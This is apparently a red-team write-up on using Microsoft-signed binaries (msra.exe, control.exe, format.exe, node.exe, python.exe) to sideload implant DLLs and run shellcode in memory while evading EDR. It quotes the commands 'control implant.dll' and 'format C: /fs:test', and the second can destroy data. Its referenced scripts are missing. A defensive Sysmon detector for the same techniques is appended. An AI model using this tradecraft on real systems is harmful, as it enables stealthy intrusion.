C2 - Foster Parents

Abuse obscure Microsoft-signed binaries to sideload malicious DLLs via search-order hijacking, COM shims, or legacy tool dependencies.

Node.js In-Memory Shellcode

Following the widely publicized NPM blockchain compromise, increased attention was directed toward the behavior of node.exe. This led to a focused assessment of how Node.js can be leveraged for stealthy post‑compromise activity. Because node.exe routinely generates legitimate HTTPS traffic, it provides a natural level of cover that can obscure command‑and‑control communication.

The project examined how Node.js can be used to execute malicious payloads directly in memory. In this approach, shellcode is loaded and run within the node.exe process without creating additional processes or writing files to disk. This behavior is made possible through Node.js’s capability to interact with native code and Windows APIs, enabling in‑memory execution that is difficult for traditional security controls to detect.

C2 implant running within node.exe process

My future plan is to upgrade this project to be stealthier; for now I've tested it on ELK and SentinelOne and, as usual, the results are no detections.

Control.exe - DLL Sideloading

By invoking control.exe with the syntax control "C:\path\to\implant.dll" the Windows Control Panel loader (control.exe) loads the DLL under the context of rundll32.exe as the parent process (due to COM activation). This technique leverages the Control Panel Item (.cpl) execution mechanism, where CPlApplet is the designated entry point. When the DLL is loaded, rundll32.exe spawns as a child of explorer.exe (if executed via GUI) or the calling process (if run from CLI), while the actual payload executes within control.exe’s memory space.

Detection evasion is achieved by process ancestry spoofing, as monitoring tools often focus on child-parent relationships (e.g., rundll32 spawning from cmd.exe is suspicious, but control.exe invoking rundll32 appears benign). The DLL must export CPlApplet to comply with the expected function prototype (int APIENTRY CPlApplet(HWND hwndCPL, UINT msg, LPARAM lParam1, LPARAM lParam2)).

Python.exe - DLL Sideloading

The ctypes module in Python allows direct interaction with the Windows API, enabling in-process DLL loading without spawning a child process. By calling ctypes.WinDLL() or ctypes.CDLL(), we can load a DLL into python.exe’s memory space, avoiding suspicious process creation (e.g., rundll32.exe). The payload executes within Python’s process context, blending in with legitimate scripting activity.

Python.exe - Load Shellcode

As mentioned above, the ctypes module in Python allows direct interaction with the Windows API. This makes it possible to load shellcode directly into the process memory of python.exe by calling Windows APIs.

The script below loads shellcode in the simplest manner; it can easily be improved by adding stealth techniques such as encrypting the shellcode, environment keying, fileless shellcode and more.

msra.exe - DLL Sideloading

By default, msra.exe (Microsoft Remote Assistance) attempts to load userenv.dll from its own directory upon execution, calling the exported function GetProfileType during initialization. This behavior enables DLL hijacking when an implant DLL (renamed to userenv.dll) is placed alongside msra.exe, forcing the OS loader to prioritize the local directory over System32.

Changing the exported function of the implant DLL
C2 over msra.exe DLL hijack

Microsoft.NodejsTools.PressAnyKey.exe

Microsoft.NodejsTools.PressAnyKey.exe is a utility bundled with Visual Studio’s Node.js development tools, designed to pause console applications (e.g., "Press any key to continue..."). It accepts command-line arguments to launch a process before waiting for user input.

This can be abused to execute a binary (DaBombC4.exe) as a child process while maintaining a benign parent process tree.

This Microsoft-signed binary can be found at the location below.

Process Hacker shows the implant binary running under Microsoft.NodejsTools.PressAnyKey.exe

Format - DLL Sideloading

A lesser-known DLL sideloading technique abuses the Windows format.exe binary by supplying a fake filesystem type via the /fs parameter.

When executing format C: /fs:test, Windows attempts to load utest.dll from the current directory. I crafted a utest.dll whose DllMain function is executed within the context of the format.exe process. In this demonstration, the utest.dll payload displays a message box when triggered. Process Hacker confirms the format.exe process in memory with the loaded malicious DLL.

The downside to this technique is that I found it challenging to load an implant DLL: DllMain has strict limitations with regard to executing WinAPI calls, which interrupts the implant's execution routine.

Inject_dll_amd64.exe - DLL Sideloading

This Microsoft-signed binary allows for DLL sideloading.

Register-CimProvider.exe - DLL Sideloading

This is a potentially vulnerable Windows binary for DLL hijacking; it requires several specific exported functions from the imported implant DLL.
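As an added defensive example (not code from this project), the following Python detector turns the observations in the msra.exe, Control.exe, Format and PressAnyKey sections above into checks over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records: msra.exe resolving userenv.dll from outside the system directories, control.exe handed a .dll instead of a .cpl, format probing u<fs>.dll for an unknown /fs value, and Microsoft.NodejsTools.PressAnyKey.exe spawning a child. Field names follow Sysmon's, the sample events are constructed, and matching format.com alongside format.exe is my assumption because System32 ships the tool as format.com.

```python
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Host binary -> DLL name pattern it resolves from its own/current directory (per the write-up).
SIDELOAD_DLLS = {"msra.exe": r"userenv\.dll", "format.exe": r"u\w+\.dll", "format.com": r"u\w+\.dll"}
KNOWN_FS = {"ntfs", "fat", "fat32", "exfat", "refs", "udf"}

def _base(path):
    return ntpath.basename(path or "").lower()

def check_image_load(ev):
    """Sysmon EID 7: a sideload-prone DLL name loaded from outside the system directories."""
    host, dll, src = _base(ev["Image"]), _base(ev["ImageLoaded"]), ev["ImageLoaded"].lower()
    pat = SIDELOAD_DLLS.get(host)
    if pat and re.fullmatch(pat, dll) and not src.startswith(SYSTEM_DIRS):
        return f"sideload: {host} loaded {dll} from {ntpath.dirname(ev['ImageLoaded'])}"
    return None

def check_process_create(ev):
    """Sysmon EID 1: proxy parents and tell-tale command lines from the write-up."""
    parent, image = _base(ev["ParentImage"]), _base(ev["Image"])
    cmd = ev.get("CommandLine", "").lower()
    if parent == "microsoft.nodejstools.pressanykey.exe":
        return f"proxy exec: PressAnyKey launched {image}"
    if image == "control.exe" and re.search(r"\.dll\b", cmd):
        return f"control.exe invoked on a .dll instead of a .cpl: {cmd}"
    if image in ("format.exe", "format.com"):
        m = re.search(r"/fs:(\w+)", cmd)
        if m and m.group(1) not in KNOWN_FS:
            return f"format with unknown filesystem '{m.group(1)}' -> probes u{m.group(1)}.dll"
    return None

def scan(events):
    """Return alert strings for a list of Sysmon-style event dicts."""
    hits = (check_image_load(e) if e["EventID"] == 7 else check_process_create(e) for e in events)
    return [h for h in hits if h]

# Constructed sample telemetry (not real logs): benign msra, msra hijack, control.exe, bad format, good format.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Windows\System32\msra.exe", "ImageLoaded": r"C:\Windows\System32\userenv.dll"},
    {"EventID": 7, "Image": r"C:\Users\bob\Desktop\msra.exe", "ImageLoaded": r"C:\Users\bob\Desktop\userenv.dll"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'control "C:\Users\bob\implant.dll"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\format.com",
     "CommandLine": "format C: /fs:test"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\format.com",
     "CommandLine": "format D: /fs:NTFS /q"},
]
```

Calling scan(SAMPLE_EVENTS) yields three alerts (the msra hijack, the control.exe .dll invocation and the /fs:test probe) and leaves the two benign records silent.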
